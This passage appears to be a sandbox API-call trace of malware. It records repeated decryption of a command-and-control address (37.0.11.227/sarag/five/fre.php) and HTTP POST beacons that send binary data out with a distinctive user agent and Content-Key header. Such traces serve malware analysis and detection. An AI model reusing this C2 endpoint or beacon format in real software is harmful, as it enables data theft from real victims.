phKey=0x19fcac*=0x69d5e8) returned 1 [0327.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.747] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.747] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.747] GetProcessHeap () returned 0x690000 [0327.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0327.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.781] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0327.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.782] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0327.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.783] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0327.783] GetProcessHeap () returned 0x690000 [0327.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0327.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.784] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0327.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.785] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0327.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.786] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0327.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.786] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0327.786] GetProcessHeap () returned 0x690000 [0327.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0327.787] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0327.787] GetProcessHeap () returned 0x690000 [0327.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0327.787] socket (af=2, type=1, protocol=6) returned 0xb70 [0327.787] connect (s=0xb70, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0327.821] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0327.821] GetProcessHeap () returned 0x690000 [0327.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0327.821] GetProcessHeap () returned 0x690000 [0327.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0327.822] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0327.823] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0327.823] GetProcessHeap () returned 0x690000 [0327.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0327.823] GetProcessHeap () returned 0x690000 [0327.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0327.824] GetProcessHeap () returned 0x690000 [0327.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0327.824] GetProcessHeap () returned 0x690000 [0327.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0327.824] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0327.825] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0327.825] GetProcessHeap () returned 0x690000 [0327.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0327.825] GetProcessHeap () returned 0x690000 [0327.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0327.826] send (s=0xb70, buf=0x6ad508*, len=242, flags=0) returned 242 [0327.826] send (s=0xb70, buf=0x6aba40*, len=159, flags=0) returned 159 [0327.826] GetProcessHeap () returned 0x690000 [0327.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0327.826] recv (in: s=0xb70, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0327.908] GetProcessHeap () returned 0x690000 [0327.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0327.909] GetProcessHeap () returned 0x690000 [0327.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0327.909] GetProcessHeap () returned 0x690000 [0327.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0327.909] GetProcessHeap () returned 0x690000 [0327.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0327.910] closesocket (s=0xb70) returned 0 [0327.910] GetProcessHeap () returned 0x690000 [0327.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0327.910] GetProcessHeap () returned 0x690000 [0327.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0327.911] GetProcessHeap () returned 0x690000 [0327.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0327.911] GetProcessHeap () returned 0x690000 [0327.912] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0327.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18bc) returned 0xb70 [0327.913] Sleep (dwMilliseconds=0xea60) [0327.917] GetProcessHeap () returned 0x690000 [0327.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0327.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.918] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.928] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0327.951] GetProcessHeap () returned 0x690000 [0327.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0327.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.952] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0327.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.953] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.954] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.954] GetProcessHeap () returned 0x690000 [0327.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0327.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.956] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0327.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.957] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0327.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.958] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0327.958] GetProcessHeap () returned 0x690000 [0327.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0327.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.959] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0327.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.960] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0327.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.961] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0327.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.961] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0327.961] GetProcessHeap () returned 0x690000 [0327.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0327.961] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0327.971] GetProcessHeap () returned 0x690000 [0327.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0327.971] GetProcessHeap () returned 0x690000 [0327.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0327.978] GetProcessHeap () returned 0x690000 [0327.978] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0327.978] GetProcessHeap () returned 0x690000 [0327.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0327.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.993] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0328.001] GetProcessHeap () returned 0x690000 [0328.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0328.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.003] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0328.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.004] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.005] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.005] GetProcessHeap () returned 0x690000 [0328.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0328.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.007] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0328.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.025] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0328.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.027] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0328.027] GetProcessHeap () returned 0x690000 [0328.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0328.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.028] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0328.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.029] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0328.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.033] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0328.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.034] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0328.034] GetProcessHeap () returned 0x690000 [0328.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0328.034] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0328.034] GetProcessHeap () returned 0x690000 [0328.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0328.035] socket (af=2, type=1, protocol=6) returned 0xb74 [0328.035] connect (s=0xb74, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0328.065] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0328.065] GetProcessHeap () returned 0x690000 [0328.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0328.065] GetProcessHeap () returned 0x690000 [0328.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0328.066] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0328.067] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0328.067] GetProcessHeap () returned 0x690000 [0328.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0328.067] GetProcessHeap () returned 0x690000 [0328.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0328.067] GetProcessHeap () returned 0x690000 [0328.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0328.067] GetProcessHeap () returned 0x690000 [0328.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0328.068] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0328.069] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0328.069] GetProcessHeap () returned 0x690000 [0328.069] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0328.069] GetProcessHeap () returned 0x690000 [0328.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0328.069] send (s=0xb74, buf=0x6ad508*, len=242, flags=0) returned 242 [0328.069] send (s=0xb74, buf=0x6aba40*, len=159, flags=0) returned 159 [0328.070] GetProcessHeap () returned 0x690000 [0328.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0328.070] recv (in: s=0xb74, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0328.142] GetProcessHeap () returned 0x690000 [0328.143] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0328.143] GetProcessHeap () returned 0x690000 [0328.143] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0328.143] GetProcessHeap () returned 0x690000 [0328.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0328.144] GetProcessHeap () returned 0x690000 [0328.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0328.144] closesocket (s=0xb74) returned 0 [0328.144] GetProcessHeap () returned 0x690000 [0328.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0328.144] GetProcessHeap () returned 0x690000 [0328.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0328.145] GetProcessHeap () returned 0x690000 [0328.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0328.145] GetProcessHeap () returned 0x690000 [0328.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0328.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18c0) returned 0xb74 [0328.147] Sleep (dwMilliseconds=0xea60) [0328.149] GetProcessHeap () returned 0x690000 [0328.149] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0328.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.149] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0328.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.154] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0328.159] GetProcessHeap () returned 0x690000 [0328.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0328.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.160] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0328.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.161] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.164] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.164] GetProcessHeap () returned 0x690000 [0328.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0328.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.166] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0328.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.166] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0328.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.167] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0328.167] GetProcessHeap () returned 0x690000 [0328.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0328.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.169] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0328.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.170] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0328.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.170] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0328.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.171] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0328.171] GetProcessHeap () returned 0x690000 [0328.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0328.171] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0328.172] GetProcessHeap () returned 0x690000 [0328.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0328.172] GetProcessHeap () returned 0x690000 [0328.173] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0328.175] GetProcessHeap () returned 0x690000 [0328.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0328.175] GetProcessHeap () returned 0x690000 [0328.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0328.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.176] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0328.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0328.188] GetProcessHeap () returned 0x690000 [0328.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0328.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.189] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0328.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.190] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.191] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.191] GetProcessHeap () returned 0x690000 [0328.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0328.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.192] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0328.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.193] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0328.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.194] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0328.194] GetProcessHeap () returned 0x690000 [0328.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0328.195] LoadLibraryW 